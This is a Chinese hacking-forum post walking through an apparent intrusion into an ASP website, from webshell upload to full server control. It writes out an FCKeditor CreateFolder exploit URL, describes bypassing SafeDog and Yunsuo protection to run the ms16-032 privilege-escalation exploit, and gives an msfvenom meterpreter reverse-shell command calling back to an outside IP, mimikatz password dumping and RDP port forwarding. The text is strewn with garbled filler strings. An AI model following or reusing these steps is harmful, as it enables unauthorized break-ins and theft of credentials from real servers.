找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2444|回复: 1
打印 上一主题 下一主题

从getwebshell到绕过安全狗云锁提权再到利用matasploit进服务器

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:31:43 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

' v3 @2 T$ Q% d) L

) _/ Y! U6 R- A2 r2 h1 {+ @$ c5 {; T" D: s, M" K0 A, _/ o1 a/ m; {9 g9 O3 a; h% @! _) g+ M' P+ ^6 k% \7 @" _. r3 |$ w+ ?3 l- A* }9 Y, M$ F, O- _% V- ^/ M
, [, O' w8 c. \* X& O

9 O& X3 B& w) e' P& P$ C5 g
; c0 @# _; j( ^- c& Y/ O
一、 利用getwebshell
4 f7 _$ \- ^( t4 v) p
( w) B, b+ v# P5 O# R0 J# [- q
首先对目标站进行扫描,发现是asp的,直接扫出网站后台和默认数据库,下载解密登陆如图:
6 D5 M$ t7 o3 g( J
! m7 u) u$ [3 ]2 @5 N+ @ 222.png
( D4 B' U$ u! o: N7 ^5 l) a
下面进后台发现有fckeditor,而且还是iis6.0的,可以考虑创建个asp目录来构造解析(fck编辑器路径被改成别的需要burpsuite抓包的时候看到)
. @# J% S# f6 P% y" K& f333.png
- s& u6 R7 ]$ l& Z' G: Z- M7 _- S
下面我们构造一个asp目录,如: . P9 Q/ n) o% T0 ? Z0 J

; ~$ B3 j5 p& r/ w

1 i+ K- ?# p1 d( U http://www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975 8 {) N0 _ v# G" o H

3 d, }' y- f. W w

, ~: A9 T: Z8 p, p2 P 然后再给shell.asp目录上传一个jpg图片格式的一句话,然后用hatchet打开,然后看了一下支持aspx,那么我们就用包含的办法先把aspx后缀名改成.rar,然后再创建个111.ASPx,里面包含rar文件,进去以后看进程有云锁和安全狗,那么,那么我们慢慢来,慢慢来。
% o; P9 j) z" R. e& }6 O
, K/ \& D, [" x1 N) j( i
一、 绕过安全狗云锁提权并且加账号
9 X( H8 z* I3 O 444.png
. x8 Y. ~" Y/ @4 q& b, q
没法看系统信息,但是根据网站404页面可以断定是2003服务器,然后接着访问C:\Program Files (x86)存在断定是2003 64位系统,那么我们说干就干,我们上传ms16-032 64位直接干,但是发现上传exe或者别的格式exp会自动消失,看进程也没杀毒呀,没错没杀毒,是云锁有个功能防御了,那么突破云锁上传的方法就是利用rar,先把exp打包为64.rar上传,然后我们翻一下rar在哪个目录,在C:\Program Files (x86),然后开干
6 c v# L4 C n1 D: j
* U( P5 U! K4 k- O% p+ n
如图:
9 ?0 e- D, q3 ^; K 555.png
1 Y7 S$ [1 O: c7 D2 i; M. [% T
然后执行直接是system权限,然后我用干狗神器给加了一个账号用tunna反弹3968提示不是远程组,我操后来也想着用getpassword64抓明文密码,但是一执行就卡死,没办法想到了metasploit
' u1 l' e( }0 u% r. j+ x
m, Z6 \" ?5 T! k7 _
一、 利用metasploit
7 c. k2 m$ K+ X% x
) U, s: w% ~' f k" [1 Y% I3 a
首先用pentestbox生成一个64位的payload如下命令
* W2 K' S1 t0 Y! i. j
1 [4 x c$ M5 I+ g8 c msfVENOM -p windows/x64meterpreter/reverse_tcp lhost=42.51.1.1 lport=443 -f exe > c:\mata.exe
4 K+ W% x: y! L H6 R
8 m; r9 H: N) ^9 `; u+ E
为什么要用443端口,之前我测试用别的端口直接被墙了没法上线,下面我们在system下执行这个mata,上线如图:
3 b O8 m$ |; S11.png
6 R3 x2 {7 W) P% O5 S8 Y
下面我们用这个命令抓一下明文密码命令1use mimikatz 命令2kerberos如下图:
0 L. V! }! \* X0 |/ F4 @1 E! Z 13.png
6 ~! J* j# u0 a
下面我们来做一个监听如下命令:
' }) V5 |/ q8 o& z8 T
6 D8 H& ~" j/ l* d portfwd add -l 6655 -p 3968 -r 127.0.0.1
,这个命令的意思就是把目标服务器的远程3968转发到pentestbox的公网IP6655端口如图:
* V1 C' C' b1 a- J7 f4 ?8 k18.png
- [% I0 s( X6 s$ P P8 |5 g

" `0 D5 Q' u- b( T
. Q+ @" _9 y; K5 I) H: P

& s% ]7 X; j$ L6 Z! G- [

T7 H2 D& M# L; T# P7 f
# p9 `3 F: B7 E5 ?8 Q1 l; t
# t4 w1 t$ F |* y/ M
, P k9 B( V* a

# G* u. O/ g7 `* E# k8 ^2 E9 O
: R8 p# S1 e. a% Y 3 U* k* g0 E- |2 ]/ H; e

/ J2 j+ u: Z; i9 Y
3 y& }3 f; E, m5 j- s3 I e) y4 ?

回复

使用道具 举报

沙发
匿名  发表于 2021-11-20 23:30:06
图片怎么都没了
回复 支持 反对

使用道具

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表